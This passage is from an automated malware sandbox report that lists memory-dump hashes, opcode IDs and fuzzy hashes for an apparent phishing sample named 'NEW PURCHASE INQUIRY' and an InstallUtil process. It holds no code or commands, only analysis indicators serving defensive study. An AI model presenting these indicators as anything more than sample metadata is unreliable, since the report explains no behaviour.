                                        • Instruction Fuzzy Hash: F7313C70D057959FDB5ACF678C006DABFF2AF8A310F05C1AAC448AB266DB340946CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2204677410.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cd0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c599d3713b2056dda9c251a1fed4654f40704f524ca0382546cd3a79197d2b80
                                        • Instruction ID: a57b6112c222641b2c82b3b2f755528305a9cab04a64926e6175645036f54564
                                        • Opcode Fuzzy Hash: c599d3713b2056dda9c251a1fed4654f40704f524ca0382546cd3a79197d2b80
                                        • Instruction Fuzzy Hash: 5A311E71D097958FE759CF2B8C4429ABFF6AF86300F04C1EAD448A6156D7740A85CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2204677410.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cd0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31ce0d03e693d220a35b548ab95b2540af174ff6c0d95477519546ad097dd4dc
                                        • Instruction ID: 31e49eebade319d015043300b9afded2bc0bc1fb52517681d041b67845443797
                                        • Opcode Fuzzy Hash: 31ce0d03e693d220a35b548ab95b2540af174ff6c0d95477519546ad097dd4dc
                                        • Instruction Fuzzy Hash: 7E319871E056288FEB68CF2BC94479AFAF6BF89304F04C1EA950CA6255D7700A85DF41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202408945.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_67e0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 271f6b42ca30ed90eedf6906cbc038fd1b9ab6dab6f96399e71f0edb1133b7e8
                                        • Instruction ID: 1a4450fcf04c95ed60010d6b7e46f7f34e3531dd430da0df75a740781d4ba220
                                        • Opcode Fuzzy Hash: 271f6b42ca30ed90eedf6906cbc038fd1b9ab6dab6f96399e71f0edb1133b7e8
                                        • Instruction Fuzzy Hash: 1531B8B1E056588BEB58CF6BC84578EFBF7AFC9300F54C1A9D408AA265DB7405858F01
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2200546787.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5bd0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 84890e79b7ffb8c11d77f1d707bbe1fe98ca2704e3e65ff4fca06f892c1249ba
                                        • Instruction ID: 01016674d0c01ca2367c6e3b76f14164517a4648546ceb7d8964c0464bdf7171
                                        • Opcode Fuzzy Hash: 84890e79b7ffb8c11d77f1d707bbe1fe98ca2704e3e65ff4fca06f892c1249ba
                                        • Instruction Fuzzy Hash: 7921E4B0E046188BEB18CF9BD8447DEFAF7AF88300F04C1AAD419AA264EB741945CF11
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2200546787.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5bd0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e77522e17d52c80726a26869b49a55321790f7f49e08d10da01f6919d6354fd
                                        • Instruction ID: 27ffcd79de452ce7498ffeff6f26fed6280f6de7996ddfe9b4bdf2cdee249c20
                                        • Opcode Fuzzy Hash: 4e77522e17d52c80726a26869b49a55321790f7f49e08d10da01f6919d6354fd
                                        • Instruction Fuzzy Hash: 382118B1E056189BEB18CF9BD8447DEFAF7AFC8300F04C1A9D419A6264EB741945CF11
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (nq$4'jq$4'jq$4'jq$4'jq$pnq
                                        • API String ID: 0-2343140522
                                        • Opcode ID: 71afa9bdd2cf50fd9274dba091fdb5c4a3252085713472deac0f828ba574e160
                                        • Instruction ID: d43b90ec8277cd2c427d84e77900efd576e8382e00492819d70648d6ed293e3a
                                        • Opcode Fuzzy Hash: 71afa9bdd2cf50fd9274dba091fdb5c4a3252085713472deac0f828ba574e160
                                        • Instruction Fuzzy Hash: A8D18136A00214DFCB45DF64C944E9ABBB6FF88310F0645A8E509AB276C732ED55CF90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (_jq$(_jq$(_jq$(_jq
                                        • API String ID: 0-437935255
                                        • Opcode ID: f5856c12805e615cd428345ea6e2345e32396161b83f1dd0e43d770409aada02
                                        • Instruction ID: 2f11e67b053059982d4d1fb0c2687d9290c5af9c7559e737da89a2198f1c6e96
                                        • Opcode Fuzzy Hash: f5856c12805e615cd428345ea6e2345e32396161b83f1dd0e43d770409aada02
                                        • Instruction Fuzzy Hash: B481F171B002559FCB44DFB8C8648AE7BBAEF86204B2445A9E4069F791DB31DC41CBA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "$6$TJoq$XXjq
                                        • API String ID: 0-2334934399
                                        • Opcode ID: 71c51e62f81f2b9df6dc598536313bbf7c24c98a8fea9ed105d33a1403e2adf6
                                        • Instruction ID: bc863e3654b9c5951f043ecad6144967d0aacd289a98449604ff8ba49d4ec45a
                                        • Opcode Fuzzy Hash: 71c51e62f81f2b9df6dc598536313bbf7c24c98a8fea9ed105d33a1403e2adf6
                                        • Instruction Fuzzy Hash: 35314974A105298FCB65DF69CC40B9AB7F6BF89301F509199E04AE7394DB349E85CF01
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3282402207.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_1230000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Tejq$Tejq
                                        • API String ID: 0-942063033
                                        • Opcode ID: b04fc707f388c57f103a41ff3629568b6e3ee9fae797c8281780743de193f4a9
                                        • Instruction ID: de8495fda908cd5a5408f3a58a3f181dc423fd20f16338b940c9ffd9ad98b951
                                        • Opcode Fuzzy Hash: b04fc707f388c57f103a41ff3629568b6e3ee9fae797c8281780743de193f4a9
                                        • Instruction Fuzzy Hash: 68413A74B502059FCB44DF68C994AAEBBF2FF89710F2144A9E406EB3A1CA359C05CF60
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3282402207.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_1230000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c480ef7aaa8bffb431ada990923c9f0f9fd41a80521a225fe1feaed99a46bc48
                                        • Instruction ID: b66b5a964fa90250b63b6ecc9f706a889e43e738b7a6f1c94c683d055ef65648
                                        • Opcode Fuzzy Hash: c480ef7aaa8bffb431ada990923c9f0f9fd41a80521a225fe1feaed99a46bc48
                                        • Instruction Fuzzy Hash: 1631C9307002048FD726DF79D858AAA7FF2EF89300B1401A9E106DB3B2DA369E00CB61
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3282402207.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_1230000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6339b3ce680fefcd9490fbf6f62f302e2e62055f281e9c8e93e3ca239e2b2ff5
                                        • Instruction ID: 85d4a1b54354e677219044835c118ed169a0b4f8ff38b17dfce27126c50ab1d6
                                        • Opcode Fuzzy Hash: 6339b3ce680fefcd9490fbf6f62f302e2e62055f281e9c8e93e3ca239e2b2ff5
                                        • Instruction Fuzzy Hash: 51314B747402058FD724DF69D958AAE7BF6AF88740F104069E606DB3A5DF71DC01CBA1
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3282402207.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_1230000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0bfbc53d371285a6ec366d9dfc887f68c93ac3c3e4ed8a79351e606a050241c9
                                        • Instruction ID: 7f66b813fb9dce38340f5883fa6c9f60beb01fa94c765833836d66676925d3d5
                                        • Opcode Fuzzy Hash: 0bfbc53d371285a6ec366d9dfc887f68c93ac3c3e4ed8a79351e606a050241c9
                                        • Instruction Fuzzy Hash: 71119DB4D29204DFE704DFE8D04939DBFF1EB85300F2080BAE04597294DB790A81CB99
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3282402207.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_1230000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d64205c4e9bf3cebbfcff0f4c9969a0a1826c354eb58d0526106eae4313232c
                                        • Instruction ID: f131d7d353ee36ca668be7f2f01bc14cff3a206550f256609983dcbf102a570f
                                        • Opcode Fuzzy Hash: 6d64205c4e9bf3cebbfcff0f4c9969a0a1826c354eb58d0526106eae4313232c
                                        • Instruction Fuzzy Hash: C1117CB4D25108DFE704DFE8D14939DBBF1FB84304F2080A9E04597284DBB55AC5CB99
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3282402207.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_1230000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 459ab94860fe5b735fdccb0462277807a85e598736964bce332ad8682a90d4d3
                                        • Instruction ID: d603492e0786ab27b1e183dfc7d50499a57e5ca46badf1dfbbb737ea73c22d25
                                        • Opcode Fuzzy Hash: 459ab94860fe5b735fdccb0462277807a85e598736964bce332ad8682a90d4d3
                                        • Instruction Fuzzy Hash: 9AF09A3084A384AFC747CBB4AD118D83FF4AE0322074942E7E845DB663E23E5F158B62
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3282402207.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_1230000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1d5a690a6a244ab9fe681af0c8d2430ce15188380bca8eaf8d78aff4d5af7638
                                        • Instruction ID: 9191d6854120c2ecd6d6f595cc82731d5ae58349f9d671d9ffcf286c409accca
                                        • Opcode Fuzzy Hash: 1d5a690a6a244ab9fe681af0c8d2430ce15188380bca8eaf8d78aff4d5af7638
                                        • Instruction Fuzzy Hash: DDF06CB4B10104CFEB254BF9C85D29877F1EFC4301F0D84A6D516D7789EA345A818F50
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3282402207.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_1230000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 17e86da1808c2c16397edc7aebcaa66bb98b40470281f5be86421bdba6d78f3f
                                        • Instruction ID: 06dcab3ec8ba4a873517632815e39f1c7f104594bc346cbace4faec71111fec5
                                        • Opcode Fuzzy Hash: 17e86da1808c2c16397edc7aebcaa66bb98b40470281f5be86421bdba6d78f3f
                                        • Instruction Fuzzy Hash: A6E04F34A483508FC7665BB494184A97FF0AF4662134100EEF446DB276EB394D41CB50
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3282402207.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_1230000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6ed19a41156682cb9ba738095618f19f24c8ae5a426dd021fac4037e54af1c69
                                        • Instruction ID: 25b30905077aff304cd1a120f3b5fc38dac1b9c69cfbf094def381d2b93b25dd
                                        • Opcode Fuzzy Hash: 6ed19a41156682cb9ba738095618f19f24c8ae5a426dd021fac4037e54af1c69
                                        • Instruction Fuzzy Hash: 7CE09A30A483819FC34A8F7898588953FF1AF4622032101EEE005DB67BE66ECE01CB41
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3282402207.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_1230000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3ae22d9ef9d3fffdd0a1958d06164c517fe1bd8006432d3473f9be3cf579b2f0
                                        • Instruction ID: cb8d477253af81c36567cdeb97258a03f2b407beb963c86e6b10809c9b45a721
                                        • Opcode Fuzzy Hash: 3ae22d9ef9d3fffdd0a1958d06164c517fe1bd8006432d3473f9be3cf579b2f0
                                        • Instruction Fuzzy Hash: D1D05B7490510CEFCB04DFF8E90555DB7FDEB44204B1081A9D408D7304DB316F009B41
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3282402207.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_1230000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56dd48aa664a043386a7c437ffb0a723bfbe38ed30cc64dd9c609c44c13d73e3
                                        • Instruction ID: 2187adf5290b2eaf2f4124e61e972a9c4f193436cac68973b77e262d57a68661
                                        • Opcode Fuzzy Hash: 56dd48aa664a043386a7c437ffb0a723bfbe38ed30cc64dd9c609c44c13d73e3
                                        • Instruction Fuzzy Hash: 85D0C9357042148FCB54ABF9E40C8997BE9AF8966178000B5F50ACB364EF359C41CB90
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3282402207.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_1230000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8de096b9b952e29e6b8adfcfcf1ff2116a0aa257c5e9cd70e6d25936354ba6b
                                        • Instruction ID: debaefff1156c6d44e8f7687824026f688abf4bebe63b17b5a56e06941038726
                                        • Opcode Fuzzy Hash: e8de096b9b952e29e6b8adfcfcf1ff2116a0aa257c5e9cd70e6d25936354ba6b
                                        • Instruction Fuzzy Hash: BCA02230022B0C82822833B0A00003033CC88800083C000B8820C08E200A33E8B2C080